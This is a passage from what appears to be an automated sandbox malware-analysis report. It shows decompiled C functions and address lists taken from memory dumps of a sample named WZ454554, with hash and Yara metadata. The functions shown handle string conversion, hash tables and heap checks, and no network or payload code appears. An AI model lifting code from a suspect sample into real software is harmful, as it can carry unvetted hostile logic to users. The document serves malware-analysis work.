										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                            0x00aeebb8
                            0x00aeebbf
                            0x00aeebc1
                            0x00aeebc6
                            0x00000000
                            0x00b2b6d6
                            0x00aeebcd
                            0x00aeebd2
                            0x00aeec95
                            0x00b2b6e0
                            0x00aeec9b
                            0x00aeeca1
                            0x00aeeca1
                            0x00aeec89
                            0x00000000
                            0x00aeec89
                            0x00aeebd8
                            0x00aeebdd
                            0x00b2b6ea
                            0x00000000
                            0x00aeebe3
                            0x00aeebe5
                            0x00aeebe7
                            0x00aeebef
                            0x00aeebf2
                            0x00000000
                            0x00aeebf5
                            0x00000000
                            0x00aeebf5
                            0x00aeebf5
                            0x00aeebf7
                            0x00b2b6f6
                            0x00aeec7c
                            0x00aeec7c
                            0x00aeec7f
                            0x00aeec82
                            0x00aeec87
                            0x00000000
                            0x00aeec87
                            0x00aeec1a
                            0x00aeec1a
                            0x00aeec25
                            0x00b2b725
                            0x00b2b72c
                            0x00b2b72c
                            0x00aeec2d
                            0x00aeec31
                            0x00b2b73c
                            0x00b2b744
                            0x00b2b748
                            0x00b2b748
                            0x00b2b749
                            0x00b2b749
                            0x00b2b74a
                            0x00b2b74a
                            0x00aeec3e
                            0x00b2b860
                            0x00000000
                            0x00aeec44
                            0x00aeec47
                            0x00b2b750
                            0x00b2b758
                            0x00b2b767
                            0x00b2b775
                            0x00b2b77c
                            0x00b2b77f
                            0x00b2b769
                            0x00b2b76c
                            0x00b2b76c
                            0x00b2b781
                            0x00b2b788
                            0x00b2b78b
                            0x00b2b75a
                            0x00b2b75d
                            0x00b2b75d
                            0x00b2b78d
                            0x00b2b792
                            0x00b2b793
                            0x00b2b793
                            0x00aeec54
                            0x00aeec56
                            0x00aeec57
                            0x00aeec59
                            0x00aeec5e
                            0x00aeecaa
                            0x00aeed16
                            0x00aeed16
                            0x00aeecac
                            0x00aeecaf
                            0x00aeecb4
                            0x00aeecb6
                            0x00aeecb6
                            0x00aeecb9
                            0x00aeecbf
                            0x00b2b7c1
                            0x00b2b7c8
                            0x00b2b7d3
                            0x00b2b7db
                            0x00b2b7ec
                            0x00b2b858
                            0x00000000
                            0x00b2b858
                            0x00b2b7ee
                            0x00b2b7f1
                            0x00b2b7f4
                            0x00b2b7ff
                            0x00b2b850
                            0x00000000
                            0x00b2b850
                            0x00b2b80a
                            0x00b2b813
                            0x00b2b81c
                            0x00b2b81d
                            0x00b2b822
                            0x00b2b825
                            0x00b2b828
                            0x00b2b831
                            0x00b2b832
                            0x00b2b837
                            0x00b2b840
                            0x00b2b842
                            0x00b2b845
                            0x00b2b848
                            0x00000000
                            0x00b2b848
                            0x00b2b7df
                            0x00000000
                            0x00b2b7df
                            0x00b2b7cc
                            0x00000000
                            0x00b2b7cc
                            0x00aeecc5
                            0x00aeecc7
                            0x00aeeccb
                            0x00b2b79b
                            0x00b2b79e
                            0x00b2b7a4
                            0x00000000
                            0x00000000
                            0x00b2b7a6
                            0x00b2b7a8
                            0x00b2b7a8
                            0x00aeecd3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aeecd5
                            0x00aeecd5
                            0x00aeecd5
                            0x00aeecd8
                            0x00aeecda
                            0x00aeece4
                            0x00000000
                            0x00000000
                            0x00aeecea
                            0x00aeeced
                            0x00aeecf0
                            0x00aeecf2
                            0x00aeecfb
                            0x00aeecfe
                            0x00aeed01
                            0x00aeed06
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aeed06
                            0x00b2b7ae
                            0x00b2b7b1
                            0x00b2b7b7
                            0x00000000
                            0x00000000
                            0x00b2b7b9
                            0x00b2b7bb
                            0x00aeed08
                            0x00aeed08
                            0x00aeed0c
                            0x00aeed0c
                            0x00000000
                            0x00aeec60
                            0x00aeec62
                            0x00aeed0f
                            0x00aeed0f
                            0x00000000
                            0x00aeed0f
                            0x00aeec68
                            0x00aeec6c
                            0x00aeec6f
                            0x00aeec75
                            0x00aeec0d
                            0x00aeec0d
                            0x00aeec18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aeec18
                            0x00aeec77
                            0x00aeec79
                            0x00aeec79
                            0x00000000
                            0x00aeec68
                            0x00aeec5e
                            0x00aeec3e
                            0x00aeebfd
                            0x00aeec02
                            0x00b2b701
                            0x00b2b70c
                            0x00b2b71b
                            0x00b2b71d
                            0x00b2b71d
                            0x00000000
                            0x00b2b70c
                            0x00aeec08
                            0x00aeec0a
                            0x00000000
                            0x00aeec0a
                            0x00aeebf5
                            0x00aeebf5

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                            • Instruction ID: 760a9a7dfdd9a312c680e9d2a1333d23849021d060c187d34642691764c068fb
                            • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                            • Instruction Fuzzy Hash: B1816F31A042E68FDB25CE69D8D067DBBA1EF96300F3845BAD84A8B341C725DC46E3D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041D976, Relevance: .2, Instructions: 246COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ba1f1e99940f47e9a6daa0350450f2fe19e9327135d8b0eedd199a984f5c178
                            • Instruction ID: fa3c7d5b089a9b653ad29e5a6eefda2831b2489621721b139879d83f2dfa9191
                            • Opcode Fuzzy Hash: 0ba1f1e99940f47e9a6daa0350450f2fe19e9327135d8b0eedd199a984f5c178
                            • Instruction Fuzzy Hash: 29C16372A58781CFC716CF39D89AB413FB6F342324B08825EC9A1931E2D7351166DF8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B703DA, Relevance: .2, Instructions: 218COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00B703DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0xba634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0xba6348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E00B7BBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E00AD2280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					L00ACFFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						L00B7BCD2(_t178,  *0xba6348,  *0xba634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E00AEF3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E00B70150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E00B70180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}













































                            0x00b703e5
                            0x00b703eb
                            0x00b703ed
                            0x00b703ef
                            0x00b703f5
                            0x00b703f8
                            0x00b703fc
                            0x00b703ff
                            0x00b70404
                            0x00b70406
                            0x00b7040b
                            0x00b70619
                            0x00b70619
                            0x00b70414
                            0x00b70417
                            0x00b7041b
                            0x00b7041e
                            0x00b70421
                            0x00b7042c
                            0x00b70436
                            0x00b70438
                            0x00b7043b
                            0x00b70440
                            0x00b70448
                            0x00b7058e
                            0x00b70596
                            0x00b7059b
                            0x00b705a0
                            0x00b705a3
                            0x00b705d1
                            0x00b705d6
                            0x00b705d9
                            0x00b705dc
                            0x00b705e2
                            0x00b705e4
                            0x00b705e7
                            0x00b705e9
                            0x00b705eb
                            0x00b705f1
                            0x00b705f4
                            0x00b705fb
                            0x00b7060b
                            0x00b7060b
                            0x00000000
                            0x00b70610
                            0x00b70450
                            0x00b70458
                            0x00b7045f
                            0x00000000
                            0x00000000
                            0x00b70465
                            0x00b7046b
                            0x00b7046f
                            0x00b7046f
                            0x00b70472
                            0x00b70478
                            0x00b7047d
                            0x00b7047f
                            0x00b70484
                            0x00b7061c
                            0x00b70622
                            0x00000000
                            0x00000000
                            0x00b70628
                            0x00b7062c
                            0x00000000
                            0x00b7048a
                            0x00b7048a
                            0x00b7048a
                            0x00b7048f
                            0x00b704a2
                            0x00b704a9
                            0x00b704ab
                            0x00b704ab
                            0x00b704ad
                            0x00b704b3
                            0x00b704b8
                            0x00b704bb
                            0x00b704c1
                            0x00b704c6
                            0x00b704ca
                            0x00b704cc
                            0x00b704dd
                            0x00b704e6
                            0x00b704e8
                            0x00b704f1
                            0x00b704f4
                            0x00b70568
                            0x00b7056b
                            0x00b70571
                            0x00b70577
                            0x00b70579
                            0x00b7057c
                            0x00b70581
                            0x00b70583
                            0x00b70586
                            0x00b7058b
                            0x00b7058b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b704f6
                            0x00b704f6
                            0x00b704f6
                            0x00b704f9
                            0x00b704fc
                            0x00b704fc
                            0x00b704ff
                            0x00b70505
                            0x00000000
                            0x00000000
                            0x00b70509
                            0x00b7050f
                            0x00b70532
                            0x00b70542
                            0x00b70544
                            0x00b7054a
                            0x00b7054c
                            0x00b7054f
                            0x00b70552
                            0x00b70552
                            0x00b70557
                            0x00b7055a
                            0x00b7055b
                            0x00b70564
                            0x00000000
                            0x00b704ce
                            0x00b704ce
                            0x00b704d0
                            0x00b704d3
                            0x00b704d3
                            0x00b704d4
                            0x00b704d6
                            0x00b704d9
                            0x00000000
                            0x00b704d3
                            0x00b704cc
                            0x00b70491
                            0x00b70496
                            0x00b7049d
                            0x00b704a0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b70498
                            0x00b70498
                            0x00b70498
                            0x00b70499
                            0x00b70499
                            0x00000000
                            0x00b70498

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64805e651c41fbc461401f633f65728c280d74cb2e648080e58164faf21a56cd
                            • Instruction ID: 7ff824e267b4f0a88e963b849a0e33b940ce4ffcebb4b6005fabfd42ff67c302
                            • Opcode Fuzzy Hash: 64805e651c41fbc461401f633f65728c280d74cb2e648080e58164faf21a56cd
                            • Instruction Fuzzy Hash: 6371A172A10215DBDB14DF58C9D1B69BBF2EB84310F1982AAD929AF385C730ED41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B6FA2B, Relevance: .2, Instructions: 214COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 25%
                            			E00B6FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0xb90e38);
				_t98 = E00B0D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0xba7bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0xb6fcfb) & 0x000000ff) * 4 +  &M00B6FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E00B7A80D(_t168);
				}
				return E00B0D0D1(_t98);
			}


























                            0x00b6fa2b
                            0x00b6fa2b
                            0x00b6fa2d
                            0x00b6fa32
                            0x00b6fa37
                            0x00b6fa3a
                            0x00b6fa3c
                            0x00b6fa43
                            0x00b6fa46
                            0x00b6fa49
                            0x00b6fa4f
                            0x00b6fa55
                            0x00b6fa58
                            0x00b6fa5d
                            0x00b6fa65
                            0x00b6fa6d
                            0x00b6fa72
                            0x00b6fa78
                            0x00b6fa7e
                            0x00b6fa8c
                            0x00b6faa2
                            0x00b6faa7
                            0x00b6faaa
                            0x00b6faaf
                            0x00b6fac4
                            0x00b6fab1
                            0x00b6fac0
                            0x00b6fac0
                            0x00b6fac8
                            0x00b6facb
                            0x00b6fad5
                            0x00b6fadb
                            0x00b6fae1
                            0x00b6fb05
                            0x00b6fb05
                            0x00b6fb08
                            0x00b6fb0b
                            0x00b6fb15
                            0x00b6fb98
                            0x00b6fb9f
                            0x00b6fba5
                            0x00b6fbb4
                            0x00b6fbb6
                            0x00b6fbb7
                            0x00b6fbbd
                            0x00000000
                            0x00b6fbbd
                            0x00b6fb17
                            0x00b6fb17
                            0x00b6fb17
                            0x00b6fb1a
                            0x00b6fb22
                            0x00b6fb40
                            0x00b6fb47
                            0x00b6fb4c
                            0x00b6fb4e
                            0x00b6fb54
                            0x00b6fb5a
                            0x00b6fb5a
                            0x00b6fb60
                            0x00b6fb66
                            0x00b6fb6d
                            0x00b6fb70
                            0x00b6fb73
                            0x00b6fb78
                            0x00b6fb7d
                            0x00b6fb8c
                            0x00b6fb90
                            0x00b6fbbf
                            0x00b6fbbf
                            0x00b6fbc6
                            0x00b6fbcd
                            0x00b6fc18
                            0x00b6fc18
                            0x00b6fc23
                            0x00b6fc3d
                            0x00b6fc3d
                            0x00b6fc25
                            0x00b6fc25
                            0x00b6fc2b
                            0x00b6fc2d
                            0x00b6fc33
                            0x00000000
                            0x00000000
                            0x00b6fc33
                            0x00b6fbcf
                            0x00b6fbd9
                            0x00b6fbdf
                            0x00b6fc00
                            0x00b6fc06
                            0x00b6fbe1
                            0x00b6fbe1
                            0x00b6fbe3
                            0x00b6fbe9
                            0x00b6fbf5
                            0x00b6fbeb
                            0x00b6fbee
                            0x00b6fbf0
                            0x00b6fbf0
                            0x00b6fbf7
                            0x00b6fbfb
                            0x00b6fc09
                            0x00b6fc10
                            0x00b6fc16
                            0x00000000
                            0x00000000
                            0x00b6fc16
                            0x00b6fbcd
                            0x00b6fb7d
                            0x00b6fb60
                            0x00b6fb54
                            0x00b6fb22
                            0x00b6fae3
                            0x00b6fae3
                            0x00b6faed
                            0x00000000
                            0x00000000
                            0x00b6faed
                            0x00b6fae1
                            0x00b6fad5
                            0x00b6fa8c
                            0x00b6fc44
                            0x00b6fc72
                            0x00b6fc7c
                            0x00b6fc82
                            0x00b6fc82
                            0x00b6fc84
                            0x00b6fc8a
                            0x00b6fcca
                            0x00b6fcca
                            0x00b6fccb
                            0x00b6fccc
                            0x00b6fccf
                            0x00b6fcd0
                            0x00000000
                            0x00b6fc8c
                            0x00b6fc93
                            0x00000000
                            0x00b6fc9a
                            0x00b6fc9b
                            0x00b6fc9c
                            0x00b6fc9f
                            0x00b6fca0
                            0x00000000
                            0x00000000
                            0x00b6fca4
                            0x00b6fca5
                            0x00b6fca6
                            0x00b6fca9
                            0x00b6fcaa
                            0x00000000
                            0x00000000
                            0x00b6fcae
                            0x00b6fcaf
                            0x00b6fcb0
                            0x00b6fcb2
                            0x00b6fcb3
                            0x00000000
                            0x00000000
                            0x00b6fcb7
                            0x00b6fcb8
                            0x00b6fcb9
                            0x00b6fcbc
                            0x00b6fcbd
                            0x00000000
                            0x00000000
                            0x00b6fcc1
                            0x00b6fcc2
                            0x00b6fcc3
                            0x00b6fcc5
                            0x00b6fcc6
                            0x00b6fcd2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b6fc93
                            0x00b6fcd3
                            0x00b6fcd5
                            0x00b6fcd5
                            0x00b6fcdf

                            Memory Dump Source
